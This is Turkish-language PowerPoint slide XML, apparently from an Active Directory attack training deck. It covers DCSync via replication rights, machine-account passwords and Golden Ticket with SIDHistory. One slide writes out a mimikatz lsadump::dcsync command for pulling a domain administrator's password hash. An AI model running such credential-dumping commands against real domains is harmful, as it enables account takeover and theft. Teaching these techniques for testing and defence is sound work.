            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>objesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>üzerinde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>GetChanges</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>GetChangesAll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>isimli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>iki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>özel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> ACE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bulunmaktadır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ACE’lere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sahip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>olan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>objeler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> DC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sunucularından</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>replikasyon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yapabilirler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sayede</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> de DC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>veritabanında</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bulunan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>tüm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>değerleri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>parola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>özetleri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>dahil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>elde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>edebilirler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Varsayılan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>olarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yetki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> DC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sunucuları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yetkili</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>gruplarda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bulunmaktadır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Saldırgan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yetkiye</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sahip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>olduktan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sonra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>istediği</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>objenin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>veya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>tüm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>objelerin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>parola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>özetini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ele</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>geçirebilir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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972A9D-33CE-1D9E-A8FB-2F9841BD1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290" y="1825625"/>
            <a:ext cx="3807419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735787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8F385-A9C3-DEFF-2407-27E142A25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TTP 0x13 – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DCSync</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - Exploitation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64A38-016A-F720-8509-410B38BC9C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1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DcSync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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t> parent domain administrator hash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>değeri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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>alınıyor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</a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>.\mimikatz.exe "privilege::debug" "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>lsadump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>dcsync</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>domain:INTERNAL.LOCAL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> /user:root123@INTERNAL.LOCAL" "exit"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D311E5-F10D-25B3-A606-FE4AD1EB9E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262312" y="2834089"/>
            <a:ext cx="5667375" cy="32647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914981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96F5A-F415-61B7-9222-23B45C1B4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TTP 0x18 – Golden Ticket w/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SIDHistory</a:t>
            </a:r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74FC2F-DAC1-BD19-D6F8-CBEA488FF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45240"/>
            <a:ext cx="10515600" cy="32072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71245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E70CE-049D-E11B-9D58-78057FC68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Önemli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Not – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Bilgisayar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Hesapları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FA478-F4BD-4126-3DB8-D5F4AF256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 err="1"/>
              <a:t>Bilgisayar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>hesaplarının</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>kullanıcı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>hesapları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>gibi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>parolaları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>bulunmaktadır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Fakat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>bu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>parolalar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>otomatize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>olarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>belirlenmiş</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>karmaşık</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>değerlerdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Bilgisayar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>hesaplarının</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>parolaları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>varsayılan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>olarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> 30 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>günde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>değiştirilmektedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Bilgisayar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>hesapları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>kullanıcı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>hesapları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>gibi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>oturum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>açma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>için</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>kullanılabilmektedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>nedenle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>yatayda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>yayılma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>yetki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>yükseltme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>amacıyla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>bilgisayar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>hesapları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>kullanılarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>daha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>az</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>tespit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>edinilecek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>şekilde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>ilerlenebilir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65879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48AAB-5882-C987-5E8E-A96B7D563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TTP 0x18 – Golden Ticket w/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SIDHistory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67116-75C4-D9B6-A00E-CFD4830AD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dirty="0"/>
              <a:t>KRBTGT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>hesabının</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>parola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>özeti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ele</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>geçirilebilirse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>bu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>bilgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ortamındaki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>istenen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>kullanıcı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
